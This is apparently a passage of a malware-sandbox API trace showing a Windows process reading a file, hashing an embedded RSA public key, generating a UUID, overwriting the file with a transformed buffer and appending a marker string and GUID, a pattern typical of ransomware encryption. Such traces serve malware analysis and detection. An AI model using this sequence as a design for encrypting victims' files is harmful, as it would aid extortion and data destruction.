dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.368] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=32986) returned 1 [0188.368] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.373] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x80b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.373] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.376] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.376] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x80da, lpOverlapped=0x0) returned 1 [0188.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.377] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.377] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.379] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.379] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.379] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.379] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.379] GetLastError () returned 0x0 [0188.379] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.379] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.379] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.379] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.380] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80e0) returned 0x2ae3ea0 [0188.380] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2608 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2650 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.381] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedf88 [0188.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2aee1a8 [0188.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1a8 | out: hHeap=0x2c0000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d910 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedf88 | out: hHeap=0x2c0000) returned 1 [0188.385] GetCurrentThreadId () returned 0x5d8 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee410 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.386] GetCurrentThreadId () returned 0x5d8 [0188.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2aedf88 [0188.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2aee198 [0188.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2aee3b0 [0188.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee198 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee3b0 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2650 | out: hHeap=0x2c0000) returned 1 [0188.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedf88 | out: hHeap=0x2c0000) returned 1 [0188.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.398] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x80d5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x80d5, lpOverlapped=0x0) returned 1 [0188.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.400] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x80da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.400] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2aedf88 [0188.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2aedf88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2aee3b8 [0188.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedf88 | out: hHeap=0x2c0000) returned 1 [0188.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.402] WriteFile (in: hFile=0x584, lpBuffer=0x2aee3b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2aee3b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee3b8 | out: hHeap=0x2c0000) returned 1 [0188.402] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.402] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.402] CloseHandle (hObject=0x584) returned 1 [0188.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) 